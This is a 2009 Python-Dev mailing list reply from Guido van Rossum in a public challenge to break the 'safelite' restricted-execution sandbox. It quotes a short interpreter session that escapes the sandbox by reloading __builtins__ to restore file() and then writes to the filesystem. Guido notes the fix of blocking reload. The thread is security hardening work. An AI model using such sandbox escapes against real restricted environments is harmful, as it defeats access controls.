[Python-Dev] Challenge: Please break this! (was: Reviving restricted mode)
Guido van Rossum
guido at python.org
Mon Feb 23 22:36:47 CET 2009
On Mon, Feb 23, 2009 at 1:12 PM, Victor Stinner
<victor.stinner at haypocalc.com> wrote:
>> The challenge is simple:
>>
>> * Open a fresh Python interpreter
>> * Do: >>> from safelite import FileReader
>> * You can use FileReader to read files on your filesystem
>> * Now find a way to *write* to the filesystem from your interpreter
>
> Well, the challenge is to get access to a module. And... it's quite simple :-p
>
> $ ./python
>>>> from safelite import FileReader
>>>> __builtins__.file
> Traceback (most recent call last):
> File "<stdin>", line 1, in <module>
> AttributeError: 'module' object has no attribute 'file'
>>>> reload(__builtins__)
> <module '__builtin__' (built-in)>
>>>> file('0wn3d', 'w').write('w00t\n')
>>>>
> $ cat 0wn3d
> w00t
>
>> Dinner and drinks on me for an evening -- when you are next in London
>> or I am in your town -- to the first person who manages to break
>> safelite.py and write to the filesystem.
>
> Cool. It's a good reason to go to Pycon UK this yeak ;-)
Tav should have made another stipulation: the attack must not be
trivial to fix. This one seems trivial, e.g. by adding 'reload' to the
list in secure_python_builtins().
--
--Guido van Rossum (home page: http://www.python.org/~guido/)
More information about the Python-Dev
mailing list